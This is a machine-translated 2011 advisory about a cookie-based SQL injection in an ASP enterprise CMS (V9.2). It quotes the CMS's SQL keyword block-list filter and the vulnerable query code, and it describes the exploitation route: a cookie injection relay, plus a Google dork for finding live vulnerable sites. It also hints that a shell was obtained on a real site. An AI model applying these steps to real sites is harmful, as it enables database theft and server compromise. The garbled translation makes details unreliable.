Crown Dragon technology enterprise website management system V9. 2 vulnerability-vulnerability warning-the black bar safety net

2011-06-12T00:00:00
ID MYHACK58:62201130832
Type myhack58
Reporter 佚名
Modified 2011-06-12T00:00:00

Description

Today a busy day, quickly issued a vulnerability.

Crown Dragon technology enterprise website management system V9. 2cookies injection vulnerability

Vulnerability files: Shownews. asp ,ProductShow. asp,DownloadShow1. asp,MovieShow. asp

Problem code:

Be the first to say the anti-injection system: Check_Sql. asp

<%

Dim Query_Badword,Form_Badword,i,Err_Message,Err_Web,name

'------ Defined part of the head----------------------------------------------------------------------

Err_Message = 1 'processing way: 1=message,2=Turn page,3=prompted first and then the steering

Err_Web = "Err. Asp" 'error when turning the page

Query_Badword="'∥and∥select∥update∥chr∥delete∥%20from∥;∥insert∥mid∥master.∥ set∥chr(3 7)∥="

'In this part of the definition of the get illegal parameters,use the"∥"intervals

Form_Badword="'∥%∥&∥*∥#∥(∥)∥=" 'in this part of the definition of the post of illegal parameters,use the"∥"intervals

'------ Definition of part of the tail----------------------------------------------------------------------- ' On Error Resume Next

'----- To get the query value of the filter.

if request. QueryString<>"" then Chk_badword=split(Query_Badword,"∥") FOR EACH Query_Name IN Request. QueryString for i=0 to ubound(Chk_badword) If Instr(LCase(request. QueryString(Query_Name)),Chk_badword(i))<>0 Then Select Case Err_Message Case "1" Response. Write "<Script Language=JavaScript>alert('pass reference error! Parameter "&name&" the value contains illegal string!\ n\n please do not in the parameters appear: and update, delete ; insert mid master and other illegal characters!'); window. close();</Script>" Case "2" Response. Write "<Script Language=JavaScript>location. href='"&amp; Err_Web&"'</Script>" Case "3" Response. Write "<Script Language=JavaScript>alert('pass reference error! Parameter "&name&"the value contains illegal string!\ n\n please do not in the parameters appear: and update, delete ; insert mid master and other illegal characters!'); location. href='"&amp; Err_Web&"';</Script>" End Select Response. End End If NEXT NEXT End if

'----- The post table single-value filter.

if request. form<>"" then Chk_badword=split(Form_Badword,"∥") FOR EACH name IN Request. Form for i=0 to ubound(Chk_badword) If Instr(LCase(request. form(name)),Chk_badword(i))<>0 Then Select Case Err_Message Case "1" Response. Write "<Script Language=JavaScript>alert('error! The form "&name&" the value contains illegal string!\ n\n please don't in form appears: % & * # ( ) other illegal characters!'); window. close();</Script>" Case "2" Response. Write "<Script Language=JavaScript>location. href='"&amp; Err_Web&"'</Script>" Case "3" Response. Write "<Script Language=JavaScript>alert('error! Parameter "&name&"the value contains illegal string!\ n\n please don't in form appears: % & * # ( ) other illegal characters!'); location. href='"&amp; Err_Web&"';</Script>" End Select Response. End End If NEXT NEXT end if %>

As can be seen, only the filtered request. QueryString and request. form, and not filtering the request. cookies

These four documents loopholes in the code exactly the same, here in ProductShow. asp as an example;

----------------------------------------------------The above is omitted part of the code---------------------------------------------------------<% ShowSmallClassType=ShowSmallClassType_Article dim ID ID=trim(request("ID")) //problem in this, the request does not specify the object, causing the cookies to injection, the breakthrough anti-injection system

if ID="" then response. Redirect("Product. asp") //id parameter value is empty, then jump to the Product. asp page, end if

sql="select * from Product where ID=" & ID & "" //id into a database query Set rs= Server. CreateObject("ADODB. Recordset") rs. open sql,conn,1,3 if rs. bof and rs. eof then response. write"<SCRIPT language=JavaScript>alert('cannot find this product!');" response. write"javascript:history. go(-1)</SCRIPT>" else rs("Hits")=rs("Hits")+1 rs. update %>

Exploit, you can use the injected transit, you can also use greenbrowser with the js plug-in for cookie injection, here I did not install greenbrowser, just to inject a transit, for example,

This unit test:

!

Network test: Google for: inurl:HrDemandAccept. asp

!

!

!

!

!

This shell is for everyone, don't do bad things Oh~